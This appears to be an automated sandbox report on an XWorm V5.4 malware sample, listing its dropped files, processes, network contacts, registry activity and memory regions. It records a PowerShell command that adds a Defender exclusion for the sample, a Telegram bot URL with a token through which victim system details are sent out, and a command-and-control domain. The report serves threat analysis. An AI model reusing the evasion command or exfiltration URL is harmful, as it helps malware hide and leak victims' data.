Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_VINQMAKI52OQ5DSR_ac49a6e8e43cdf6b966cd8165e24dd382453b1_3ff4ead9_b9b6324b-4ad3-4219-8fac-93424fd68963\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7A57.tmp.dmp
|
Mini DuMP crash report, 15 streams, Wed Sep 25 09:33:20 2024, 0x1205a4 type
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7EDD.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7F0C.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2gxfn111.dfi.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_coqbk5j1.kuj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jqvi3wjx.qt2.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qnojatvs.u4o.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\appcompat\Programs\Amcache.hve
|
MS Windows registry file, NT/2000 or above
|
dropped
|
There are 2 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
|
"C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"
|
|
|
|
C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
|
"C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"
|
|
|
|
C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
|
"C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\wbem\WmiPrvSE.exe
|
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
|
||
|
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 6552 -s 1128
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://api.telegram.org/bot7503421576:AAFe-HqEJI6A9e-kdWp8RSPiI27fCE4Lw2Q/sendMessage?chat_id=985088883&text=%E2%98%A0%20%5BXWorm%20V5.4%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AA0FB38C6050D4C23DA87%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20BSY776%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.4
|
149.154.167.220
|
|
|
|
various-wages.gl.at.ply.gg
|
|
||
|
https://api.telegram.org/bot
|
unknown
|
|
|
|
http://upx.sf.net
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameP
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
various-wages.gl.at.ply.gg
|
147.185.221.22
|
|
|
|
api.telegram.org
|
149.154.167.220
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
|
|
|
147.185.221.22
|
various-wages.gl.at.ply.gg
|
United States
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASMANCS
|
FileDirectory
|
||
|
\REGISTRY\A\{4bee3115-a353-980b-566d-08f58536e05a}\Root\InventoryApplicationFile\securiteinfo.com|4402256fe862f487
|
ProgramId
|
||
|
\REGISTRY\A\{4bee3115-a353-980b-566d-08f58536e05a}\Root\InventoryApplicationFile\securiteinfo.com|4402256fe862f487
|
FileId
|
||
|
\REGISTRY\A\{4bee3115-a353-980b-566d-08f58536e05a}\Root\InventoryApplicationFile\securiteinfo.com|4402256fe862f487
|
LowerCaseLongPath
|
||
|
\REGISTRY\A\{4bee3115-a353-980b-566d-08f58536e05a}\Root\InventoryApplicationFile\securiteinfo.com|4402256fe862f487
|
LongPathHash
|
||
|
\REGISTRY\A\{4bee3115-a353-980b-566d-08f58536e05a}\Root\InventoryApplicationFile\securiteinfo.com|4402256fe862f487
|
Name
|
||
|
\REGISTRY\A\{4bee3115-a353-980b-566d-08f58536e05a}\Root\InventoryApplicationFile\securiteinfo.com|4402256fe862f487
|
OriginalFileName
|
||
|
\REGISTRY\A\{4bee3115-a353-980b-566d-08f58536e05a}\Root\InventoryApplicationFile\securiteinfo.com|4402256fe862f487
|
Publisher
|
||
|
\REGISTRY\A\{4bee3115-a353-980b-566d-08f58536e05a}\Root\InventoryApplicationFile\securiteinfo.com|4402256fe862f487
|
Version
|
||
|
\REGISTRY\A\{4bee3115-a353-980b-566d-08f58536e05a}\Root\InventoryApplicationFile\securiteinfo.com|4402256fe862f487
|
BinFileVersion
|
||
|
\REGISTRY\A\{4bee3115-a353-980b-566d-08f58536e05a}\Root\InventoryApplicationFile\securiteinfo.com|4402256fe862f487
|
BinaryType
|
||
|
\REGISTRY\A\{4bee3115-a353-980b-566d-08f58536e05a}\Root\InventoryApplicationFile\securiteinfo.com|4402256fe862f487
|
ProductName
|
||
|
\REGISTRY\A\{4bee3115-a353-980b-566d-08f58536e05a}\Root\InventoryApplicationFile\securiteinfo.com|4402256fe862f487
|
ProductVersion
|
||
|
\REGISTRY\A\{4bee3115-a353-980b-566d-08f58536e05a}\Root\InventoryApplicationFile\securiteinfo.com|4402256fe862f487
|
LinkDate
|
||
|
\REGISTRY\A\{4bee3115-a353-980b-566d-08f58536e05a}\Root\InventoryApplicationFile\securiteinfo.com|4402256fe862f487
|
BinProductVersion
|
||
|
\REGISTRY\A\{4bee3115-a353-980b-566d-08f58536e05a}\Root\InventoryApplicationFile\securiteinfo.com|4402256fe862f487
|
AppxPackageFullName
|
||
|
\REGISTRY\A\{4bee3115-a353-980b-566d-08f58536e05a}\Root\InventoryApplicationFile\securiteinfo.com|4402256fe862f487
|
AppxPackageRelativeId
|
||
|
\REGISTRY\A\{4bee3115-a353-980b-566d-08f58536e05a}\Root\InventoryApplicationFile\securiteinfo.com|4402256fe862f487
|
Size
|
||
|
\REGISTRY\A\{4bee3115-a353-980b-566d-08f58536e05a}\Root\InventoryApplicationFile\securiteinfo.com|4402256fe862f487
|
Language
|
||
|
\REGISTRY\A\{4bee3115-a353-980b-566d-08f58536e05a}\Root\InventoryApplicationFile\securiteinfo.com|4402256fe862f487
|
Usn
|
There are 24 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
25B1000
|
trusted library allocation
|
page read and write
|
|
|
|
402000
|
remote allocation
|
page execute and read and write
|
|
|
|
5140000
|
trusted library allocation
|
page read and write
|
||
|
4A30000
|
trusted library allocation
|
page read and write
|
||
|
6C20000
|
trusted library allocation
|
page read and write
|
||
|
9F0000
|
trusted library allocation
|
page read and write
|
||
|
B90000
|
heap
|
page read and write
|
||
|
9C2E000
|
stack
|
page read and write
|
||
|
4E6D000
|
stack
|
page read and write
|
||
|
9790000
|
trusted library allocation
|
page execute and read and write
|
||
|
844000
|
trusted library allocation
|
page read and write
|
||
|
4AF2000
|
trusted library allocation
|
page read and write
|
||
|
9DAE000
|
stack
|
page read and write
|
||
|
6D32000
|
trusted library allocation
|
page read and write
|
||
|
2634000
|
trusted library allocation
|
page read and write
|
||
|
9C0000
|
trusted library allocation
|
page read and write
|
||
|
F08000
|
heap
|
page read and write
|
||
|
A6F000
|
heap
|
page read and write
|
||
|
117D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2CC9000
|
trusted library allocation
|
page read and write
|
||
|
F29000
|
heap
|
page read and write
|
||
|
85D000
|
trusted library allocation
|
page execute and read and write
|
||
|
5A1E000
|
stack
|
page read and write
|
||
|
FDF000
|
heap
|
page read and write
|
||
|
870000
|
trusted library allocation
|
page read and write
|
||
|
2CE0000
|
heap
|
page read and write
|
||
|
681E000
|
heap
|
page read and write
|
||
|
853000
|
trusted library allocation
|
page read and write
|
||
|
6870000
|
trusted library section
|
page read and write
|
||
|
FA4000
|
heap
|
page read and write
|
||
|
9AFE000
|
stack
|
page read and write
|
||
|
F1E000
|
heap
|
page read and write
|
||
|
5120000
|
trusted library allocation
|
page read and write
|
||
|
6B5D000
|
stack
|
page read and write
|
||
|
3E51000
|
trusted library allocation
|
page read and write
|
||
|
2EB3000
|
trusted library allocation
|
page read and write
|
||
|
53DB000
|
trusted library allocation
|
page read and write
|
||
|
2C18000
|
trusted library allocation
|
page read and write
|
||
|
5000000
|
heap
|
page read and write
|
||
|
59C0000
|
trusted library allocation
|
page read and write
|
||
|
715E000
|
stack
|
page read and write
|
||
|
230000
|
unkown
|
page readonly
|
||
|
72FC000
|
stack
|
page read and write
|
||
|
5440000
|
heap
|
page read and write
|
||
|
A4E000
|
stack
|
page read and write
|
||
|
830000
|
trusted library allocation
|
page read and write
|
||
|
57AE000
|
stack
|
page read and write
|
||
|
11D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
850000
|
trusted library allocation
|
page read and write
|
||
|
9FEF000
|
stack
|
page read and write
|
||
|
24A0000
|
heap
|
page execute and read and write
|
||
|
BD0000
|
heap
|
page read and write
|
||
|
A16C000
|
stack
|
page read and write
|
||
|
2E30000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
FC8000
|
heap
|
page read and write
|
||
|
4A51000
|
trusted library allocation
|
page read and write
|
||
|
A02E000
|
stack
|
page read and write
|
||
|
6C1E000
|
stack
|
page read and write
|
||
|
71AD000
|
stack
|
page read and write
|
||
|
A00000
|
heap
|
page read and write
|
||
|
35B9000
|
trusted library allocation
|
page read and write
|
||
|
2C0E000
|
stack
|
page read and write
|
||
|
872000
|
trusted library allocation
|
page read and write
|
||
|
6790000
|
heap
|
page read and write
|
||
|
4D40000
|
trusted library section
|
page readonly
|
||
|
4FF0000
|
heap
|
page read and write
|
||
|
45EB000
|
stack
|
page read and write
|
||
|
2DEE000
|
stack
|
page read and write
|
||
|
98C0000
|
heap
|
page read and write
|
||
|
F36000
|
heap
|
page read and write
|
||
|
5463000
|
heap
|
page read and write
|
||
|
119A000
|
trusted library allocation
|
page execute and read and write
|
||
|
3EB7000
|
trusted library allocation
|
page read and write
|
||
|
676E000
|
stack
|
page read and write
|
||
|
1180000
|
trusted library allocation
|
page read and write
|
||
|
4D60000
|
heap
|
page read and write
|
||
|
75DF000
|
stack
|
page read and write
|
||
|
1192000
|
trusted library allocation
|
page read and write
|
||
|
5BCC000
|
stack
|
page read and write
|
||
|
5670000
|
heap
|
page read and write
|
||
|
11AB000
|
trusted library allocation
|
page execute and read and write
|
||
|
80E000
|
stack
|
page read and write
|
||
|
97DE000
|
stack
|
page read and write
|
||
|
C4E000
|
stack
|
page read and write
|
||
|
9EAE000
|
stack
|
page read and write
|
||
|
6873000
|
heap
|
page read and write
|
||
|
390000
|
heap
|
page read and write
|
||
|
87A000
|
trusted library allocation
|
page execute and read and write
|
||
|
3A0000
|
heap
|
page read and write
|
||
|
4D65000
|
heap
|
page read and write
|
||
|
110E000
|
stack
|
page read and write
|
||
|
5320000
|
heap
|
page execute and read and write
|
||
|
4BC3000
|
heap
|
page read and write
|
||
|
5310000
|
trusted library allocation
|
page read and write
|
||
|
84D000
|
trusted library allocation
|
page execute and read and write
|
||
|
4BC0000
|
heap
|
page read and write
|
||
|
759D000
|
stack
|
page read and write
|
||
|
9E0000
|
trusted library allocation
|
page read and write
|
||
|
AA9000
|
heap
|
page read and write
|
||
|
3EE000
|
stack
|
page read and write
|
||
|
6C5F000
|
stack
|
page read and write
|
||
|
35B1000
|
trusted library allocation
|
page read and write
|
||
|
2EA3000
|
trusted library allocation
|
page read and write
|
||
|
1174000
|
trusted library allocation
|
page read and write
|
||
|
6F7000
|
stack
|
page read and write
|
||
|
30D3000
|
trusted library allocation
|
page read and write
|
||
|
98E000
|
stack
|
page read and write
|
||
|
99B000
|
trusted library allocation
|
page execute and read and write
|
||
|
683A000
|
heap
|
page read and write
|
||
|
F34000
|
heap
|
page read and write
|
||
|
25AE000
|
stack
|
page read and write
|
||
|
867000
|
heap
|
page read and write
|
||
|
4CF0000
|
heap
|
page execute and read and write
|
||
|
7F1D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4EA0000
|
heap
|
page read and write
|
||
|
5315000
|
trusted library allocation
|
page read and write
|
||
|
6793000
|
heap
|
page read and write
|
||
|
A77000
|
heap
|
page read and write
|
||
|
EF8000
|
stack
|
page read and write
|
||
|
53FD000
|
trusted library allocation
|
page read and write
|
||
|
2796000
|
trusted library allocation
|
page read and write
|
||
|
FA8000
|
heap
|
page read and write
|
||
|
B4B000
|
stack
|
page read and write
|
||
|
4F4D000
|
stack
|
page read and write
|
||
|
46EC000
|
stack
|
page read and write
|
||
|
52CA000
|
stack
|
page read and write
|
||
|
5309000
|
stack
|
page read and write
|
||
|
2CC0000
|
trusted library allocation
|
page read and write
|
||
|
4A3B000
|
trusted library allocation
|
page read and write
|
||
|
AC7000
|
heap
|
page read and write
|
||
|
1196000
|
trusted library allocation
|
page execute and read and write
|
||
|
5A40000
|
heap
|
page read and write
|
||
|
3E79000
|
trusted library allocation
|
page read and write
|
||
|
876000
|
trusted library allocation
|
page execute and read and write
|
||
|
1200000
|
heap
|
page read and write
|
||
|
2E51000
|
trusted library allocation
|
page read and write
|
||
|
6880000
|
heap
|
page read and write
|
||
|
9D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
57B0000
|
trusted library allocation
|
page read and write
|
||
|
4E70000
|
heap
|
page read and write
|
||
|
1160000
|
trusted library allocation
|
page read and write
|
||
|
5402000
|
trusted library allocation
|
page read and write
|
||
|
7EFD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4E80000
|
heap
|
page read and write
|
||
|
66F0000
|
trusted library allocation
|
page read and write
|
||
|
5130000
|
trusted library allocation
|
page execute and read and write
|
||
|
72B0000
|
heap
|
page read and write
|
||
|
53F1000
|
trusted library allocation
|
page read and write
|
||
|
329000
|
stack
|
page read and write
|
||
|
1183000
|
trusted library allocation
|
page read and write
|
||
|
F00000
|
heap
|
page read and write
|
||
|
67F8000
|
heap
|
page read and write
|
||
|
1173000
|
trusted library allocation
|
page execute and read and write
|
||
|
705E000
|
stack
|
page read and write
|
||
|
2CDF000
|
trusted library allocation
|
page read and write
|
||
|
4D3B000
|
stack
|
page read and write
|
||
|
5410000
|
trusted library allocation
|
page read and write
|
||
|
6780000
|
trusted library allocation
|
page execute and read and write
|
||
|
2CD0000
|
trusted library allocation
|
page read and write
|
||
|
4B00000
|
heap
|
page read and write
|
||
|
11A2000
|
trusted library allocation
|
page read and write
|
||
|
2CDD000
|
trusted library allocation
|
page read and write
|
||
|
11E0000
|
trusted library allocation
|
page read and write
|
||
|
4AF0000
|
trusted library allocation
|
page read and write
|
||
|
A26C000
|
stack
|
page read and write
|
||
|
2490000
|
trusted library allocation
|
page read and write
|
||
|
11A7000
|
trusted library allocation
|
page execute and read and write
|
||
|
860000
|
heap
|
page read and write
|
||
|
BC0000
|
heap
|
page read and write
|
||
|
64CD000
|
stack
|
page read and write
|
||
|
11A0000
|
trusted library allocation
|
page read and write
|
||
|
5668000
|
stack
|
page read and write
|
||
|
4A56000
|
trusted library allocation
|
page read and write
|
||
|
5C0B000
|
stack
|
page read and write
|
||
|
9A0000
|
heap
|
page read and write
|
||
|
5110000
|
trusted library allocation
|
page read and write
|
||
|
4D50000
|
heap
|
page read and write
|
||
|
FE4000
|
heap
|
page read and write
|
||
|
65CC000
|
stack
|
page read and write
|
||
|
6797000
|
heap
|
page read and write
|
||
|
1207000
|
heap
|
page read and write
|
||
|
5100000
|
trusted library allocation
|
page execute and read and write
|
||
|
53D0000
|
trusted library allocation
|
page read and write
|
||
|
66D0000
|
trusted library allocation
|
page read and write
|
||
|
4AA0000
|
trusted library allocation
|
page read and write
|
||
|
2E9A000
|
trusted library allocation
|
page read and write
|
||
|
130E000
|
stack
|
page read and write
|
||
|
67CA000
|
heap
|
page read and write
|
||
|
114C000
|
stack
|
page read and write
|
||
|
5B4F000
|
stack
|
page read and write
|
||
|
53F6000
|
trusted library allocation
|
page read and write
|
||
|
B4A000
|
heap
|
page read and write
|
||
|
765F000
|
stack
|
page read and write
|
||
|
2632000
|
trusted library allocation
|
page read and write
|
||
|
1420000
|
heap
|
page read and write
|
||
|
140D000
|
stack
|
page read and write
|
||
|
2EA7000
|
trusted library allocation
|
page read and write
|
||
|
4A62000
|
trusted library allocation
|
page read and write
|
||
|
1170000
|
trusted library allocation
|
page read and write
|
||
|
2E2C000
|
stack
|
page read and write
|
||
|
6BC0000
|
trusted library allocation
|
page read and write
|
||
|
6824000
|
heap
|
page read and write
|
||
|
AEE000
|
heap
|
page read and write
|
||
|
6BCB000
|
trusted library allocation
|
page read and write
|
||
|
5460000
|
heap
|
page read and write
|
||
|
840000
|
trusted library allocation
|
page read and write
|
||
|
9EEE000
|
stack
|
page read and write
|
||
|
5430000
|
trusted library allocation
|
page execute and read and write
|
||
|
77DC000
|
stack
|
page read and write
|
||
|
4BB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
78DD000
|
stack
|
page read and write
|
||
|
232000
|
unkown
|
page readonly
|
||
|
99FD000
|
stack
|
page read and write
|
||
|
1427000
|
heap
|
page read and write
|
||
|
6890000
|
heap
|
page read and write
|
||
|
4A4E000
|
trusted library allocation
|
page read and write
|
||
|
5569000
|
stack
|
page read and write
|
||
|
2E96000
|
trusted library allocation
|
page read and write
|
||
|
A36E000
|
stack
|
page read and write
|
||
|
66CD000
|
stack
|
page read and write
|
||
|
727F000
|
stack
|
page read and write
|
||
|
53D4000
|
trusted library allocation
|
page read and write
|
||
|
9D2F000
|
stack
|
page read and write
|
||
|
23F8000
|
trusted library allocation
|
page read and write
|
||
|
A5E000
|
heap
|
page read and write
|
||
|
997000
|
trusted library allocation
|
page execute and read and write
|
||
|
6B70000
|
trusted library section
|
page read and write
|
||
|
72AB000
|
stack
|
page read and write
|
||
|
686E000
|
stack
|
page read and write
|
||
|
118D000
|
trusted library allocation
|
page execute and read and write
|
||
|
6770000
|
trusted library allocation
|
page read and write
|
||
|
992000
|
trusted library allocation
|
page read and write
|
||
|
4A60000
|
trusted library allocation
|
page read and write
|
||
|
4CC0000
|
trusted library allocation
|
page read and write
|
||
|
880000
|
heap
|
page read and write
|
||
|
5450000
|
trusted library allocation
|
page execute and read and write
|
||
|
6889000
|
heap
|
page read and write
|
||
|
5B8C000
|
stack
|
page read and write
|
||
|
4A70000
|
trusted library allocation
|
page read and write
|
||
|
791C000
|
stack
|
page read and write
|
||
|
A12F000
|
stack
|
page read and write
|
||
|
4A80000
|
trusted library allocation
|
page read and write
|
||
|
1190000
|
trusted library allocation
|
page read and write
|
||
|
68BB000
|
heap
|
page read and write
|
||
|
2E40000
|
heap
|
page execute and read and write
|
||
|
11C0000
|
trusted library allocation
|
page read and write
|
||
|
4A5D000
|
trusted library allocation
|
page read and write
|
||
|
A50000
|
heap
|
page read and write
|
||
|
73FC000
|
stack
|
page read and write
|
||
|
67A0000
|
heap
|
page read and write
|
||
|
A92000
|
heap
|
page read and write
|
||
|
53EE000
|
trusted library allocation
|
page read and write
|
||
|
B03000
|
heap
|
page read and write
|
||
|
843000
|
trusted library allocation
|
page execute and read and write
|
||
|
4AE0000
|
heap
|
page read and write
|
||
|
761E000
|
stack
|
page read and write
|
||
|
4A75000
|
trusted library allocation
|
page read and write
|
||
|
7A1E000
|
stack
|
page read and write
|
||
|
633E000
|
stack
|
page read and write
|
||
|
682B000
|
heap
|
page read and write
|
||
|
6BD0000
|
trusted library allocation
|
page read and write
|
||
|
1410000
|
trusted library allocation
|
page read and write
|
There are 253 hidden memdumps, click here to show them.